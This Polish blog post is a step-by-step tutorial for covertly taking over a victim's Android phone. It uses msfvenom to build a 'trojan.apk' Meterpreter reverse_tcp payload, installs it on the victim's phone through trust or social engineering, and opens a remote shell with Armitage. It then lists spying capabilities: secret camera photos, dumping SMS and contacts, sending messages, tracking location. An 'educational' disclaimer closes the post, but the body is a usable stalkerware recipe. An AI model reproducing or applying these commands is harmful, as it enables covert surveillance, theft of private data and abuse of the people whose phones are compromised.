Przejmowanie kontroli nad Androidem. ParrotOS/armitage.

      Za kilka dni odbędzie się dzień otwarty w mojej szkole. A jako, że zawaliłem drugą klasę, nie załapałem się na praktyki zagraniczne i zostałem w Polsce, muszę przy nich pomagać. Mój brak doświadczenia i umiejętności spowodował, że poszedłem na łatwiznę na tyle ile się dało i znalazłem najprostszy sposób przejęcia kontroli nad system Android. Nie spodziewałem się, że to aż tak prosta sprawa, może to zrobić w zasadzie każdy, a ofiara nawet się nie zorientuje. Dlatego warto uczyć się informatyki. Ochrona przed takimi atakami będzie w niedalekiej przyszłości niezbędna. 











     Do przeprowadzenia całego ataku wystarczy system do pentestów- Kali Linux, lub ParrotOs i zaufanie ofiary co do korzystania z jej telefonu. Opcjonalnie dobre umiejętności SocialEngineering. Będziemy potrzebowali dostępu do urządzenia ofiary na krótką chwilę.

    Wygenerujemy plik "trojan.apk", który będziemy musieli zainstalować na telefonie ofiary(musi mieć możliwość instalowania aplikacji z nieznanych źródłem). Program instaluje się raz, następnie działa w tle jako Serwis.

   Potem, dzięki Armitage, przejmiemy kontrolę nad Androidem. 


(Armitage jest gotowym narzędziem wbudowanym w systemy pentesterskie. Służy do wizualizacji podatnych celów i proponowania exploitów) 


Zaczniemy od wygenerowania trojana.

Odpalamy terminal, logujemy się na konto administratora root, komendą:

- sudo su

następnie uruchamiamy w nim serwer PostgreSQL, komendą:
-service postgresql start






Teraz wygenerujemy naszego trojana. W terminalu musimy wpisać komendę:

- sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= TUTAJ WASZ ADRES IP  LPORT=4444 -o trojan.apk


Plik pojawi się w folderze Home. Musimy go zgrać na urządzenie i zainstalować.











Teraz odpalamy Armitage. W pierwszy okienku nic nie zmieniamy. 










W lewym menu wybieramy payload>android>meterpreter>reverce_tcp.
LHOST powinien być naszym adresem ip, a LPORT portem który wpisaliśmy generując trojana. Odpalamy. 










Teraz program będzie czekał na sygnał z telefonu. Uruchamiamy trojana na naszym urządzeniu.Musi być w tej samej sieci lokalnej w której jest nasz komputer. I gotowe.
Pojawia się urządzenie naszej ofiary.









Klikamy PPM na ofiarę>mterpreter 1>Interact>Meterpreter Shell.
Jesteśmy w urządzeniu ofiary. 

























Poprzez komendy możemy robić wszystko z urządzeniem ofiary pomimo zablokowanego ekranu. Możemy robić zdjęcia obiema kamerkami, zgrać wszystkie wiadomości SMS, kontakty do pliku na komputerze, odpalać każdą aplikacje na urządzeniu, wysyłać wiadomości z numeru ofiary, określić jego lokalizację. Możemy wszystko a ofiara nawet się nie zorientuje. 
Wpisując >help, macie całą listę dostępnych poleceń. 









   Jeśli zachowacie ostrożność, nie będziecie instalować pirackich aplikacji z nieznanych źródeł i żadna z zaufanych wam bliskich nie przeprowadzi na was takiego ataku będzie bezpieczni, ale warto pamiętać o tym jakie to proste. 





Hexslav

Wpis nie ma na celu namawiania do przestępstwa, jest czysto edukacyjny. Służy jako przestroga przed nieostrożnym używaniem telefonu i udostępnianie go znajomym.

Komentarze

Prześlij komentarz

Popularne posty z tego bloga

Zamek centralny w polonezie za cenę przesyłki.

Czy naprawa poloneza szarą taśmą to dobry pomysł? Problem z autem w Boże Narodzenie 200km od domu.